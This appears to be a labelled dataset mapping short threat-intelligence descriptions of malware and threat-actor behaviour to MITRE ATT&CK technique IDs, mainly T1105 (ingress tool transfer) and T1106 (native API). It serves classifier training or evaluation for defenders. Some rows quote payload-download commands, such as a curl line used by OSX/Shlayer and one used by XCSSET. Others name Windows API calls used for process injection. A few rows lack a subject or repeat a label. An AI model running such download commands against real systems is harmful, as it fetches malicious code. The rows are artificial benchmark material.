{"text1":"China Chopper's server component can download remote files.","labels":"['T1105']"}
|
|
{"text1":"Chrommme can download its code from C2.","labels":"['T1105']"}
|
|
{"text1":"Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files.","labels":"['T1105']"}
|
|
{"text1":"Conficker downloads an HTTP server to the infected machine.","labels":"['T1105']"}
|
|
{"text1":"Confucius has downloaded additional files and payloads onto a compromised host following initial access.","labels":"['T1105']"}
|
|
{"text1":"CookieMiner can download additional scripts from a web server.","labels":"['T1105']"}
|
|
{"text1":"CostaBricks can download additional payloads onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"CostaBricks has been used to load SombRAT onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"CreepyDrive can download files to the compromised host.","labels":"['T1105']"}
|
|
{"text1":"Cryptoistic has the ability to send and receive files.","labels":"['T1105']"}
|
|
{"text1":"Cuba can download files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"Cyclops Blink has the ability to download files to target systems.","labels":"['T1105']"}
|
|
{"text1":"DDKONG downloads and uploads files on the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"DOGCALL can download and execute additional payloads.","labels":"['T1105']"}
|
|
{"text1":"Dacls can download its payload from a C2 server.","labels":"['T1105']"}
|
|
{"text1":"DanBot can download additional files to a targeted system.","labels":"['T1105']"}
|
|
{"text1":"DarkComet can load any files onto the infected machine to execute.","labels":"['T1105']"}
|
|
{"text1":"Darkhotel has used first-stage payloads that download additional malware from C2 servers.","labels":"['T1105']"}
|
|
{"text1":"Diavol can receive configuration updates and additional payloads including wscpy.exe from C2.","labels":"['T1105']"}
|
|
{"text1":"DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`.","labels":"['T1105']"}
|
|
{"text1":"Doki has downloaded scripts from C2.","labels":"['T1105']"}
|
|
{"text1":"Donut can download and execute previously staged shellcode payloads.","labels":"['T1105']"}
|
|
{"text1":"Dragonfly downloaded tools from a remote server after they were inside the victim network.","labels":"['T1105']"}
|
|
{"text1":"Dragonfly has copied and installed tools for operations once in the victim environment.","labels":"['T1105']"}
|
|
{"text1":"DropBook can download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"Drovorub can download files to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Dtrack can download and upload a file to the victim\u2019s computer.","labels":"['T1105']"}
|
|
{"text1":"During C0015, the threat actors downloaded additional tools and files onto a compromised network.","labels":"['T1105']"}
|
|
{"text1":"During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"During Frankenstein, the threat actors downloaded files and tools onto a victim machine.","labels":"['T1105']"}
|
|
{"text1":"During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader.","labels":"['T1105']"}
|
|
{"text1":"Dyre has a command to download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"Egregor has the ability to download files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"Ember Bear has used tools to download malicious code.","labels":"['T1105']"}
|
|
{"text1":"Emissary has the capability to download files from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Empire can upload and download to and from a victim machine.","labels":"['T1105']"}
|
|
{"text1":"EvilBunny has downloaded additional Lua scripts from the C2.","labels":"['T1105']"}
|
|
{"text1":"Evilnum can deploy additional components or tools as needed.","labels":"['T1105']"}
|
|
{"text1":"Exaramel for Linux has a command to download a file from and to a remote C2 server.","labels":"['T1105']"}
|
|
{"text1":"Exaramel has a command to download a file from a remote server to execute.","labels":"['T1105']"}
|
|
{"text1":"Explosive has a function to download a file to the infected system.","labels":"['T1105']"}
|
|
{"text1":"FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.","labels":"['T1105']"}
|
|
{"text1":"FIN8 has used remote code execution to download subsequent payloads.","labels":"['T1105']"}
|
|
{"text1":"FYAnti can download additional payloads to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Felismus can download files from remote servers.","labels":"['T1105']"}
|
|
{"text1":"Flagpro can download additional malware from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Frankenstein has uploaded and downloaded files to utilize additional plugins.","labels":"['T1105']"}
|
|
{"text1":"FunnyDream can download additional files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.","labels":"['T1105']"}
|
|
{"text1":"Gamaredon Group has downloaded additional malware and tools onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Gazer can execute a task to download a file.","labels":"['T1105']"}
|
|
{"text1":"Gelsemium can download additional plug-ins to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Gold Dragon can download additional components from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"GoldMax can download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.","labels":"['T1105']"}
|
|
{"text1":"Gorgon Group malware can download additional files from C2 servers.","labels":"['T1105']"}
|
|
{"text1":"Grandoreiro can download its second stage from a hardcoded URL within the loader's code.","labels":"['T1105']"}
|
|
{"text1":"GreyEnergy can download additional modules and payloads.","labels":"['T1105']"}
|
|
{"text1":"GrimAgent has the ability to download and execute additional payloads.","labels":"['T1105']"}
|
|
{"text1":"GuLoader can download further malware for execution on the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.","labels":"['T1105']"}
|
|
{"text1":"HAFNIUM has downloaded malware and tools, including Nishang and PowerCat, onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"HAWKBALL has downloaded additional files from the C2.","labels":"['T1105']"}
|
|
{"text1":"HTTPBrowser is capable of writing a file to the compromised system from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Hancitor has the ability to download additional files from C2.","labels":"['T1105']"}
|
|
{"text1":"Helminth can download additional files.","labels":"['T1105']"}
|
|
{"text1":"HiddenWasp downloads a tar compressed archive from a download server to the system.","labels":"['T1105']"}
|
|
{"text1":"Hikit has the ability to download files to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.","labels":"['T1105']"}
|
|
{"text1":"HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.","labels":"['T1105']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can download files and additional malware components.","labels":"['T1105']"}
|
|
{"text1":"HyperBro has the ability to download additional files.","labels":"['T1105']"}
|
|
{"text1":"IcedID has the ability to download additional modules and a configuration file from C2.","labels":"['T1105']"}
|
|
{"text1":"IndigoZebra has downloaded additional files and tools from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"InvisiMole can upload files to the victim's machine for operations.","labels":"['T1105']"}
|
|
{"text1":"Ixeshe can download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"JPIN can download files and upgrade itself.","labels":"['T1105']"}
|
|
{"text1":"Javali can download payloads from remote C2 servers.","labels":"['T1105']"}
|
|
{"text1":"KEYMARBLE can upload files to the victim\u2019s machine and can download additional payloads.","labels":"['T1105']"}
|
|
{"text1":"KOCTOPUS has executed a PowerShell command to download a file to the system.","labels":"['T1105']"}
|
|
{"text1":"KONNI can download files and execute them on the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"Kasidet has the ability to download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"Kazuar downloads additional plug-ins to load on the victim\u2019s machine, including the ability to upgrade and replace its own binary.","labels":"['T1105']"}
|
|
{"text1":"Ke3chang has used tools to download files to compromised machines.","labels":"['T1105']"}
|
|
{"text1":"Kessel can download additional modules from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Kevin can download files to the compromised host.","labels":"['T1105']"}
|
|
{"text1":"KeyBoy has download and upload functionality.","labels":"['T1105']"}
|
|
{"text1":"Kinsing has downloaded additional lateral movement scripts from C2.","labels":"['T1105']"}
|
|
{"text1":"Kwampirs downloads additional files from C2 servers.","labels":"['T1105']"}
|
|
{"text1":"LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.","labels":"['T1105']"}
|
|
{"text1":"Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"LazyScripter had downloaded additional tools to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Leviathan has downloaded additional scripts and files from adversary-controlled servers.","labels":"['T1105']"}
|
|
{"text1":"LitePower has the ability to download payloads containing system commands to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"LoudMiner used SCP to update the miner from the C2.","labels":"['T1105']"}
|
|
{"text1":"Lucifer can download and execute a replica of itself using certutil.","labels":"['T1105']"}
|
|
{"text1":"MCMD can upload additional files to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"MacMa has downloaded additional files, including an exploit used for privilege escalation.","labels":"['T1105']"}
|
|
{"text1":"Machete can download additional files for execution on the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.","labels":"['T1105']"}
|
|
{"text1":"MechaFlounder has the ability to upload and download files to and from a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Melcoz has the ability to download additional files to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Metamorfo has used MSI files to download additional files to execute.","labels":"['T1105']"}
|
|
{"text1":"Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.","labels":"['T1105']"}
|
|
{"text1":"MiniDuke can download additional encrypted backdoors onto the victim via GIF files.","labels":"['T1105']"}
|
|
{"text1":"Mis-Type has downloaded additional malware and files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Misdat is capable of downloading files from the C2.","labels":"['T1105']"}
|
|
{"text1":"Mivast has the capability to download and execute .exe files.","labels":"['T1105']"}
|
|
{"text1":"MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.","labels":"['T1105']"}
|
|
{"text1":"MoleNet can download additional payloads from the C2.","labels":"['T1105']"}
|
|
{"text1":"Molerats used executables to download malicious files from different sources.","labels":"['T1105']"}
|
|
{"text1":"Mongall can download files to targeted systems.","labels":"['T1105']"}
|
|
{"text1":"More_eggs can download and launch additional payloads.","labels":"['T1105']"}
|
|
{"text1":"Moses Staff has downloaded and installed web shells to the following path \"C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\IISpool.aspx\".","labels":"['T1105']"}
|
|
{"text1":"Mosquito can upload and download files to the victim.","labels":"['T1105']"}
|
|
{"text1":"MuddyWater has used malware that can upload additional files to the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"Mustang Panda has downloaded additional executables following the initial infection stage.","labels":"['T1105']"}
|
|
{"text1":"NDiskMonitor can download and execute a file from a given URL.","labels":"['T1105']"}
|
|
{"text1":"NETWIRE can download payloads from C2 to the compromised host.","labels":"['T1105']"}
|
|
{"text1":"NOKKI has downloaded a remote module for execution.","labels":"['T1105']"}
|
|
{"text1":"NanoCore has the capability to download and activate additional modules for execution.","labels":"['T1105']"}
|
|
{"text1":"Nebulae can download files from C2.","labels":"['T1105']"}
|
|
{"text1":"Neoichor can download additional files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Nidiran can download and execute files.","labels":"['T1105']"}
|
|
{"text1":"Nomadic Octopus has used malicious macros to download additional files to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"OSX\/Shlayer can download payloads, and extract bytes from files. OSX\/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory.","labels":"['T1105']"}
|
|
{"text1":"OSX_OCEANLOTUS.D has a command to download and execute a file on the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"OilRig can download remote files onto victims.","labels":"['T1105']"}
|
|
{"text1":"Operation Wocao can download additional files to the infected system.","labels":"['T1105']"}
|
|
{"text1":"Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.","labels":"['T1105', 'T1569.002']"}
|
|
{"text1":"Orz can download files onto the victim.","labels":"['T1105']"}
|
|
{"text1":"OutSteel can download files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"P.A.S. Webshell can upload and download files to and from compromised hosts.","labels":"['T1105']"}
|
|
{"text1":"P8RAT can download additional payloads to a target system.","labels":"['T1105']"}
|
|
{"text1":"PLAINTEE has downloaded and executed additional plugins.","labels":"['T1105']"}
|
|
{"text1":"PLATINUM has transferred files using the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel.","labels":"['T1105']"}
|
|
{"text1":"POSHSPY downloads and executes additional PowerShell code and Windows binaries.","labels":"['T1105']"}
|
|
{"text1":"POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.","labels":"['T1105']"}
|
|
{"text1":"POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"POWRUNER can download or upload files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"Pasam creates a backdoor through which remote attackers can upload files.","labels":"['T1105']"}
|
|
{"text1":"Penquin can execute the command code \"do_download\" to retrieve remote files from C2.","labels":"['T1105']"}
|
|
{"text1":"Peppy can download and execute remote files.","labels":"['T1105']"}
|
|
{"text1":"PipeMon can install additional modules via C2 commands.","labels":"['T1105']"}
|
|
{"text1":"Pisloader has a command to upload a file to the victim machine.","labels":"['T1105']"}
|
|
{"text1":"PlugX has a module to download and execute files on the compromised machine.","labels":"['T1105']"}
|
|
{"text1":"PoisonIvy creates a backdoor through which remote attackers can upload files.","labels":"['T1105']"}
|
|
{"text1":"PolyglotDuke can retrieve payloads from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Pony can download additional files onto the infected system.","labels":"['T1105']"}
|
|
{"text1":"PowerDuke has a command to download a file.","labels":"['T1105']"}
|
|
{"text1":"PowerLess can download additional payloads to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"PowerPunch can download payloads from adversary infrastructure.","labels":"['T1105']"}
|
|
{"text1":"Psylo has a command to download a file to the system from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"Pupy can upload and download to\/from a victim machine.","labels":"['T1105']"}
|
|
{"text1":"QakBot has the ability to download additional components and malware.","labels":"['T1105']"}
|
|
{"text1":"QuietSieve can download and execute payloads on a target host.","labels":"['T1105']"}
|
|
{"text1":"RATANKBA uploads and downloads information.","labels":"['T1105']"}
|
|
{"text1":"RCSession has the ability to drop additional files to an infected machine.","labels":"['T1105']"}
|
|
{"text1":"RDAT can download files via DNS.","labels":"['T1105']"}
|
|
{"text1":"REvil can download a copy of itself from an attacker controlled IP address to the victim machine.","labels":"['T1105']"}
|
|
{"text1":"RGDoor uploads and downloads files to and from the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"ROKRAT can retrieve additional malicious payloads from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"RTM can download additional files.","labels":"['T1105']"}
|
|
{"text1":"RainyDay can download files to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Rancor has downloaded additional malware, including by using certutil.","labels":"['T1105']"}
|
|
{"text1":"RedLeaves is capable of downloading a file from a specified URL.","labels":"['T1105']"}
|
|
{"text1":"RegDuke can download files from C2.","labels":"['T1105']"}
|
|
{"text1":"Remcos can upload and download files to and from the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"RemoteUtilities can upload and download files to and from a target machine.","labels":"['T1105']"}
|
|
{"text1":"Revenge RAT has the ability to upload and download files.","labels":"['T1105']"}
|
|
{"text1":"RogueRobin can save a new file to the system from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"S-Type can download additional files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"SDBbot has the ability to download a DLL from C2 to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"SHUTTERSPEED can download and execute an arbitrary executable.","labels":"['T1105']"}
|
|
{"text1":"SILENTTRINITY can load additional files and tools, including Mimikatz.","labels":"['T1105']"}
|
|
{"text1":"SLOTHFULMEDIA has downloaded files onto a victim machine.","labels":"['T1105']"}
|
|
{"text1":"SLOWDRIFT downloads additional payloads.","labels":"['T1105']"}
|
|
{"text1":"SMOKEDHAM has used PowerShell to download UltraVNC and Ngrok from third-party file sharing sites.","labels":"['T1105']"}
|
|
{"text1":"SUNBURST delivered different payloads, including TEARDROP in at least one instance.","labels":"['T1105']"}
|
|
{"text1":"Saint Bot can download additional files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Sakula has the capability to download files.","labels":"['T1105']"}
|
|
{"text1":"SeaDuke is capable of uploading and downloading files.","labels":"['T1105']"}
|
|
{"text1":"Seasalt has a command to download additional files.","labels":"['T1105']"}
|
|
{"text1":"ServHelper may download additional files to execute.","labels":"['T1105']"}
|
|
{"text1":"Seth-Locker has the ability to download and execute files on a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Shamoon can download an executable to run on the victim.","labels":"['T1105']"}
|
|
{"text1":"Shark can download additional files from its C2 via HTTP or DNS.","labels":"['T1105']"}
|
|
{"text1":"SharpStage has the ability to download and execute additional payloads via the Dropbox API.","labels":"['T1105']"}
|
|
{"text1":"Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader.","labels":"['T1105']"}
|
|
{"text1":"ShimRat can download additional files.","labels":"['T1105']"}
|
|
{"text1":"ShimRatReporter had the ability to download additional payloads.","labels":"['T1105']"}
|
|
{"text1":"Sibot can download and execute a payload onto a compromised system.","labels":"['T1105']"}
|
|
{"text1":"SideCopy has delivered trojanized executables via spearphishing emails that contact actor-controlled servers to download malicious payloads.","labels":"['T1105']"}
|
|
{"text1":"SideTwist has the ability to download additional files.","labels":"['T1105']"}
|
|
{"text1":"Sidewinder has used LNK files to download remote files to the victim's network.","labels":"['T1105']"}
|
|
{"text1":"Silence has downloaded additional modules and malware to victim\u2019s machines.","labels":"['T1105']"}
|
|
{"text1":"Skidmap has the ability to download files on an infected host.","labels":"['T1105']"}
|
|
{"text1":"Sliver can upload files from the C2 server to the victim machine using the \"upload\" command.","labels":"['T1105']"}
|
|
{"text1":"Small Sieve has the ability to download files.","labels":"['T1105']"}
|
|
{"text1":"SodaMaster has the ability to download additional payloads from C2 to the targeted system.","labels":"['T1105']"}
|
|
{"text1":"SpeakUp downloads and executes additional files from a remote server.","labels":"['T1105']"}
|
|
{"text1":"SpicyOmelette can download malicious files from threat actor controlled AWS URLs.","labels":"['T1105']"}
|
|
{"text1":"Squirrelwaffle has downloaded and executed additional encoded payloads.","labels":"['T1105']"}
|
|
{"text1":"StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"StrifeWater can download updates and auxiliary modules.","labels":"['T1105']"}
|
|
{"text1":"StrongPity can download files to specified targets.","labels":"['T1105']"}
|
|
{"text1":"SysUpdate has the ability to download files to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"TA505 has downloaded additional malware to execute on victim systems.","labels":"['T1105']"}
|
|
{"text1":"TA551 has retrieved DLLs and installer binaries for malware execution from C2.","labels":"['T1105']"}
|
|
{"text1":"TAINTEDSCRIBE can download additional modules from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"TSCookie has the ability to upload and download files to and from the infected host.","labels":"['T1105']"}
|
|
{"text1":"TURNEDUP is capable of downloading additional files.","labels":"['T1105']"}
|
|
{"text1":"TYPEFRAME can upload and download files to the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"Taidoor has downloaded additional files onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"TeamTNT has the \"curl\" and \"wget\" commands as well as batch scripts to download new tools.","labels":"['T1105']"}
|
|
{"text1":"The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.","labels":"['T1105']"}
|
|
{"text1":"The Winnti for Windows dropper can place malicious payloads on targeted systems.","labels":"['T1105']"}
|
|
{"text1":"ThiefQuest can download and execute payloads in-memory or from disk.","labels":"['T1105']"}
|
|
{"text1":"Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"ThreatNeedle can download additional tools to enable lateral movement.","labels":"['T1105']"}
|
|
{"text1":"TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware.","labels":"['T1105']"}
|
|
{"text1":"Tomiris can download files and execute them on a victim's system.","labels":"['T1105']"}
|
|
{"text1":"Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.","labels":"['T1105']"}
|
|
{"text1":"TrickBot downloads several additional files and saves them to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"Trojan.Karagany can upload, download, and execute files on the victim.","labels":"['T1105']"}
|
|
{"text1":"Tropic Trooper has used a delivered trojan to download additional files.","labels":"['T1105']"}
|
|
{"text1":"UBoatRAT can upload and download files to the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"Unknown Logger is capable of downloading remote files.","labels":"['T1105']"}
|
|
{"text1":"Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.","labels":"['T1105']"}
|
|
{"text1":"VBShower has the ability to download VBS files to the target computer.","labels":"['T1105']"}
|
|
{"text1":"VERMIN can download and upload files to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.","labels":"['T1105']"}
|
|
{"text1":"Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and Ursnif.","labels":"['T1105']"}
|
|
{"text1":"Vasport can download files.","labels":"['T1105']"}
|
|
{"text1":"Volatile Cedar can deploy additional tools.","labels":"['T1105']"}
|
|
{"text1":"Volgmer can download remote files and additional payloads to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"WIRTE has downloaded PowerShell code from the C2 server to be executed.","labels":"['T1105']"}
|
|
{"text1":"WarzoneRAT can download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"Waterbear can receive and load executables from remote C2 servers.","labels":"['T1105']"}
|
|
{"text1":"WellMail can receive data and executable scripts from C2.","labels":"['T1105']"}
|
|
{"text1":"Whitefly has the ability to download additional tools from the C2.","labels":"['T1105']"}
|
|
{"text1":"Windshift has used tools to deploy additional payloads to compromised hosts.","labels":"['T1105']"}
|
|
{"text1":"Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.","labels":"['T1105']"}
|
|
{"text1":"XCSSET downloads browser specific AppleScript modules using a constructed URL with the \"curl\" command, \"https:\/\/\" & domain & \"\/agent\/scripts\/\" & moduleName & \".applescript\".","labels":"['T1105']"}
|
|
{"text1":"XTunnel is capable of downloading additional files.","labels":"['T1105']"}
|
|
{"text1":"YAHOYAH uses HTTP GET requests to download other files that are executed in memory.","labels":"['T1105']"}
|
|
{"text1":"ZLib has the ability to download files.","labels":"['T1105']"}
|
|
{"text1":"ZeroT can download additional payloads onto the victim.","labels":"['T1105']"}
|
|
{"text1":"ZxShell has a command to transfer files from a remote host.","labels":"['T1105']"}
|
|
{"text1":"ZxxZ can download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"build_downer has the ability to download files from C2 to the infected host.","labels":"['T1105']"}
|
|
{"text1":"can download and execute a second-stage payload.","labels":"['T1105', 'T1105']"}
|
|
{"text1":"cmd can be used to copy files to\/from a remotely connected external system.","labels":"['T1105']"}
|
|
{"text1":"creates a backdoor through which remote attackers can upload files.","labels":"['T1105', 'T1105']"}
|
|
{"text1":"esentutl can be used to copy files from a given URL.","labels":"['T1105']"}
|
|
{"text1":"ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment.","labels":"['T1105']"}
|
|
{"text1":"gh0st RAT can download files to the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"menuPass has installed updates and new malware on victims.","labels":"['T1105']"}
|
|
{"text1":"njRAT can download files to the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"xCaon has a command to download files to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.","labels":"['T1106']"}
|
|
{"text1":"APT38 has used the Windows API to execute code within a victim's system.","labels":"['T1106']"}
|
|
{"text1":"Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.","labels":"['T1106']"}
|
|
{"text1":"AppleSeed has the ability to use multiple dynamically resolved API calls.","labels":"['T1106']"}
|
|
{"text1":"Aria-body has the ability to launch files using \"ShellExecute\".","labels":"['T1106']"}
|
|
{"text1":"Attor's dispatcher has used CreateProcessW API for execution.","labels":"['T1106']"}
|
|
{"text1":"Avaddon has used the Windows Crypto API to generate an AES key.","labels":"['T1106']"}
|
|
{"text1":"BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.","labels":"['T1106']"}
|
|
{"text1":"BBK has the ability to use the \"CreatePipe\" API to add a sub-process for execution via cmd.","labels":"['T1106']"}
|
|
{"text1":"Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution.","labels":"['T1106']"}
|
|
{"text1":"BackConfig can leverage API functions such as \"ShellExecuteA\" and \"HttpOpenRequestA\" in the process of downloading and executing files.","labels":"['T1106']"}
|
|
{"text1":"Bandook has used the ShellExecuteW() function call.","labels":"['T1106']"}
|
|
{"text1":"Bankshot creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().","labels":"['T1106']"}
|
|
{"text1":"Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread.","labels":"['T1106']"}
|
|
{"text1":"BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including \"RegEnumKeyW\".","labels":"['T1106']"}
|
|
{"text1":"BlackTech has used built-in API functions.","labels":"['T1106']"}
|
|
{"text1":"BloodHound can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.","labels":"['T1106']"}
|
|
{"text1":"BoxCaon has used Windows API calls to obtain information about the compromised host.","labels":"['T1106']"}
|
|
{"text1":"Bumblebee can use multiple Native APIs.","labels":"['T1106']"}
|
|
{"text1":"CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.","labels":"['T1106']"}
|
|
{"text1":"Chaes used the \"CreateFileW()\" API function with read permissions to access downloaded payloads.","labels":"['T1106']"}
|
|
{"text1":"Chimera has used direct Windows system calls by leveraging Dumpert.","labels":"['T1106']"}
|
|
{"text1":"Chrommme can use Windows API including `WinExec` for execution.","labels":"['T1106']"}
|
|
{"text1":"Clop has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc().","labels":"['T1106']"}
|
|
{"text1":"Cobalt Strike's \"beacon\" payload is capable of running shell commands without \"cmd.exe\" and PowerShell commands without \"powershell.exe\".","labels":"['T1106']"}
|
|
{"text1":"ComRAT can load a PE file from memory or the file system and execute it with \"CreateProcessW\".","labels":"['T1106']"}
|
|
{"text1":"Conti has used API calls during execution.","labels":"['T1106']"}
|
|
{"text1":"Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.","labels":"['T1106']"}
|
|
{"text1":"Denis used the \"IsDebuggerPresent\", \"OutputDebugString\", and \"SetLastError\" APIs to avoid debugging. Denis used \"GetProcAddress\" and \"LoadLibrary\" to dynamically resolve APIs. Denis also used the \"Wow64SetThreadContext\" API as part of a process hollowing process.","labels":"['T1106']"}
|
|
{"text1":"Diavol has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.","labels":"['T1106']"}
|
|
{"text1":"Donut code modules use various API functions to load and inject code.","labels":"['T1106']"}
|
|
{"text1":"Dridex has used the \"OutputDebugStringW\" function to avoid malware analysis as part of its anti-debugging technique.","labels":"['T1106']"}
|
|
{"text1":"During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.","labels":"['T1106']"}
|
|
{"text1":"During Operation Wocao, threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.","labels":"['T1106']"}
|
|
{"text1":"Egregor has used the Windows API to make detection more difficult.","labels":"['T1106']"}
|
|
{"text1":"Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks.","labels":"['T1106']"}
|
|
{"text1":"EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox.","labels":"['T1106']"}
|
|
{"text1":"Explosive has a function to call the OpenClipboard wrapper.","labels":"['T1106']"}
|
|
{"text1":"Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`.","labels":"['T1106']"}
|
|
{"text1":"FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed.","labels":"['T1106']"}
|
|
{"text1":"FunnyDream can use Native API for defense evasion, discovery, and collection.","labels":"['T1106']"}
|
|
{"text1":"Gamaredon Group malware has used \"CreateProcess\" to launch additional malicious components.","labels":"['T1106']"}
|
|
{"text1":"Gelsemium has the ability to use various Windows API functions to perform tasks.","labels":"['T1106']"}
|
|
{"text1":"GoldenSpy can execute remote commands in the Windows command shell using the \"WinExec()\" API.","labels":"['T1106']"}
|
|
{"text1":"Goopy has the ability to enumerate the infected system's user name via \"GetUserNameW\".","labels":"['T1106']"}
|
|
{"text1":"Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution.","labels":"['T1106']"}
|
|
{"text1":"Grandoreiro can execute through the \"WinExec\" API.","labels":"['T1106']"}
|
|
